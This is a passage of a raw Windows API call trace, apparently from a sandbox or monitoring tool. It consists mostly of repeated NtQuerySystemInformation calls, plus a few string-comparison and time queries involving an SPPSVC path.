[0273.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x20, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0273.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0273.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0273.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x28, ResultLength=0x0) [0273.277] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb50, Length=0x28, ResultLength=0x0) [0273.277] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0273.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0273.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0273.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x28, ResultLength=0x0) [0273.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x28, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0273.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x20, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x20, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcc30 | out: lpSystemTimeAsFileTime=0xc751dfcc30*(dwLowDateTime=0x4299a5f, dwHighDateTime=0x1d5fb6f)) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc20, Length=0x28, ResultLength=0x0) [0273.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x50, ResultLength=0x0) [0273.287] GetTickCount () returned 0x11849e8 [0273.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0273.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0273.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0273.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0273.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0273.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x28, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0273.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x20, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.308] 